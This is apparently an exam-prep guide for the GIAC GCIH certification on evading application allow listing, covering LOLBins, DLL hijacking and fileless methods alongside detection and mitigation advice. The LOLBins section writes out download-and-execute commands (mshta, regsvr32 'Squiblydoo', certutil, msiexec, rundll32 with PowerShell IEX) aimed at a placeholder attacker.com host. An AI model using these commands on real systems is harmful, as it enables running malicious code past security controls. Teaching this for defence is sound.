Application Allow List Evasion

Application Allow List Evasion: A Comprehensive Guide for GIAC GCIH Certification

Introduction to Application Allow List Evasion

Application allow listing (formerly known as application whitelisting) is a security control that permits only pre-approved applications to execute on a system. It is one of the most effective endpoint protection mechanisms available. However, attackers have developed numerous techniques to bypass these controls, making Application Allow List Evasion a critical topic for security professionals and a key area tested in the GIAC GCIH certification exam.

Why Is Application Allow List Evasion Important?

Understanding allow list evasion is essential for several reasons:

1. Defense-in-depth awareness: Security professionals must understand that no single control is foolproof. Even robust allow listing solutions can be circumvented by determined attackers.

2. Post-exploitation relevance: After gaining initial access, attackers frequently encounter allow list restrictions that prevent them from running custom malware or tools. Evasion techniques enable attackers to maintain persistence and execute their objectives.

3. Incident response capability: GCIH-certified professionals must recognize the artifacts and indicators of allow list bypass attempts to effectively detect and respond to intrusions.

4. Improved security posture: By understanding how attackers bypass these controls, defenders can implement more resilient configurations and complementary detection mechanisms.

What Is Application Allow List Evasion?

Application allow list evasion refers to the collection of techniques attackers use to execute unauthorized code on systems protected by application allow listing solutions. These techniques exploit trusted applications, system utilities, and scripting engines that are typically permitted by allow list policies to execute arbitrary or malicious code.

The fundamental principle behind most evasion techniques is simple: if you cannot run your own application, leverage one that is already trusted.

Common allow listing solutions include:
- Microsoft AppLocker
- Windows Defender Application Control (WDAC) (formerly Device Guard)
- Software Restriction Policies (SRP)
- Third-party solutions like Carbon Black App Control, Airlock Digital, etc.

How Application Allow List Evasion Works

Attackers employ several categories of techniques to bypass allow list controls:

1. Living Off the Land Binaries and Scripts (LOLBAS/LOLBins)

This is the most prevalent evasion category. Attackers abuse legitimate, Microsoft-signed binaries that are already present on Windows systems and are typically allowed by default. Key examples include:

- mshta.exe: Executes HTML Applications (HTA files) that can contain VBScript or JavaScript. An attacker can run: mshta.exe http://attacker.com/payload.hta

- rundll32.exe: Loads and executes DLL files or JavaScript. Example: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell").Run("powershell -ep bypass -c IEX(cmd)")

- regsvr32.exe: Registers COM objects but can be abused to download and execute SCT (scriptlet) files from remote locations. This is known as the Squiblydoo attack: regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll

- certutil.exe: A certificate management utility that can download files: certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe

- cscript.exe / wscript.exe: Windows Script Host engines that execute VBScript and JScript files.

- msiexec.exe: Installs MSI packages, which can contain malicious payloads: msiexec /q /i http://attacker.com/payload.msi

- InstallUtil.exe: A .NET utility that can be used to execute code through custom installer classes, bypassing AppLocker rules.

- MSBuild.exe: The Microsoft Build Engine can compile and execute inline C# code from XML project files without creating an executable on disk.

2. Script-Based Evasion

- PowerShell: Even when constrained, attackers may use PowerShell in Constrained Language Mode bypass techniques, or use PowerShell without invoking powershell.exe (e.g., through the System.Management.Automation .NET assembly).

- DLL-based execution: Loading malicious DLLs through trusted processes using techniques like DLL side-loading or DLL search order hijacking.

- Macro-enabled documents: Microsoft Office applications are often allowed, and macros within documents can execute arbitrary code within the context of the trusted application.

3. Trusted Directory Exploitation

Some allow list solutions trust all executables within certain directories (e.g., C:\Windows\). If an attacker can write to a subdirectory within the trusted path, they can place and execute their payload from that trusted location. Writable subdirectories under C:\Windows include:
- C:\Windows\Temp
- C:\Windows\Tasks
- Certain user-writable subdirectories

4. Alternate Data Streams (ADS)

Attackers can hide payloads within NTFS alternate data streams and execute them using trusted utilities, sometimes bypassing allow list checks that only inspect the primary data stream.

5. DLL Hijacking and Side-Loading

When a trusted, allow-listed application loads DLLs, attackers can replace or introduce malicious DLLs in locations searched by the application. The trusted process loads and executes the malicious DLL, effectively running the attacker's code under the umbrella of a permitted application.

6. Fileless Techniques

Since allow listing often focuses on files written to disk, attackers use fileless techniques such as:
- Process injection into already-running trusted processes
- Reflective DLL injection
- Memory-only payloads delivered through trusted scripting engines

7. Bypassing Specific Solutions

AppLocker-specific bypasses:
- Default AppLocker rules often allow execution from C:\Windows and C:\Program Files, which may have writable subdirectories
- AppLocker may not block .NET assemblies loaded via InstallUtil.exe, RegAsm.exe, or RegSvcs.exe
- Using allowed scripting engines to load and execute code

Software Restriction Policies (SRP) bypasses:
- SRP does not control all execution methods (e.g., DLL loading may not be restricted by default)
- Certain file types may not be covered by the policy

Notable Frameworks and Resources

- LOLBAS Project (https://lolbas-project.github.io/): A comprehensive catalog of Living Off the Land Binaries, Scripts, and Libraries that can be abused for evasion.
- MITRE ATT&CK: Techniques T1218 (System Binary Proxy Execution) and its sub-techniques document many of these evasion methods.
- UltimateAppLockerByPassList: A community-maintained list of AppLocker bypass techniques.

Detection and Mitigation Strategies

As a GCIH candidate, you should also understand how to defend against these evasion techniques:

- Constrain PowerShell: Use Constrained Language Mode, enable Script Block Logging, Module Logging, and Transcription Logging.
- Block unnecessary LOLBins: If your organization does not need mshta.exe, regsvr32.exe, or certutil.exe for legitimate purposes, block them via allow list policy.
- Implement WDAC over AppLocker: Windows Defender Application Control is a more robust kernel-enforced solution compared to AppLocker.
- Monitor for abuse: Use EDR solutions and SIEM rules to detect suspicious use of trusted binaries (e.g., certutil downloading files, mshta executing from temp directories).
- Remove writable directories from trusted paths: Ensure that users cannot write to directories that are implicitly trusted by the allow list policy.
- Enable DLL enforcement: Configure allow list solutions to also control DLL loading, not just executable files.

Exam Tips: Answering Questions on Application Allow List Evasion

The GCIH exam will test your practical knowledge of these techniques. Here are key tips to excel:

1. Memorize Key LOLBins and Their Functions:
You must know the primary LOLBins by name and what they do. Focus especially on: mshta.exe, regsvr32.exe, rundll32.exe, certutil.exe, msbuild.exe, installutil.exe, cscript.exe/wscript.exe, msiexec.exe. Know the specific command-line syntax for common attacks using each.

2. Understand the Squiblydoo Attack:
This is a frequently tested concept. Remember that it uses regsvr32.exe to download and execute a remote SCT (scriptlet) file. The key flag is /i:URL combined with scrobj.dll.

3. Know AppLocker Default Rules:
Default AppLocker rules allow execution from C:\Windows and C:\Program Files for all users, and from anywhere for Administrators. Understand why this is a weakness (writable subdirectories).

4. Differentiate Between AppLocker and WDAC:
AppLocker is a user-mode enforcement mechanism that can be bypassed more easily. WDAC (Device Guard) is kernel-enforced and more difficult to bypass. Exam questions may ask you to compare their relative strengths.

5. Recognize Command-Line Indicators:
Exam scenarios may present command lines and ask you to identify the technique. Be able to recognize:
- mshta http://... → HTA execution
- regsvr32 /s /n /u /i:http://... → Squiblydoo
- certutil -urlcache -split -f http://... → File download
- msbuild.exe project.xml → Inline code compilation and execution
- rundll32 javascript:... → Script execution via rundll32

6. Map Techniques to MITRE ATT&CK:
Many evasion techniques fall under T1218 – System Binary Proxy Execution. Sub-techniques include T1218.005 (Mshta), T1218.010 (Regsvr32), T1218.011 (Rundll32), etc. Being able to reference these shows comprehensive understanding.

7. Think Like Both Attacker and Defender:
Questions may ask how to detect or prevent a specific bypass. For detection, think about: command-line logging, process parent-child relationships (e.g., mshta.exe spawning powershell.exe), and Windows Event Log entries. For prevention, think about removing the LOLBin from the allow list or adding specific deny rules.

8. Understand Fileless vs. File-Based Evasion:
Know the difference between evasion techniques that require writing a file to disk versus those that operate entirely in memory. Fileless techniques are harder to detect with traditional allow listing because there is no file to evaluate.

9. Scenario-Based Thinking:
The GCIH exam often presents scenarios. If a question describes an attacker who has gained initial access but cannot run custom executables, think immediately about LOLBins and trusted application abuse. If the scenario mentions AppLocker, consider default rule weaknesses and known bypass binaries.

10. Index Your Materials:
The GCIH exam is open-book. Create a well-organized reference with a table of LOLBins, their command-line syntax, associated MITRE ATT&CK IDs, and the allow list solutions they can bypass. A quick-reference table can save precious time during the exam.

Summary

Application allow list evasion is a cornerstone topic in post-exploitation and evasion techniques for the GCIH exam. The key takeaway is that attackers leverage trusted, already-approved binaries to execute malicious actions, circumventing the fundamental assumption of allow listing controls. By thoroughly understanding the specific tools (LOLBins), attack techniques (Squiblydoo, fileless execution, DLL hijacking), and defensive countermeasures (enhanced logging, WDAC, deny rules for unnecessary utilities), you will be well-prepared to answer exam questions confidently and accurately. Remember to focus on practical recognition of command-line patterns and the ability to map observed behaviors to specific evasion techniques.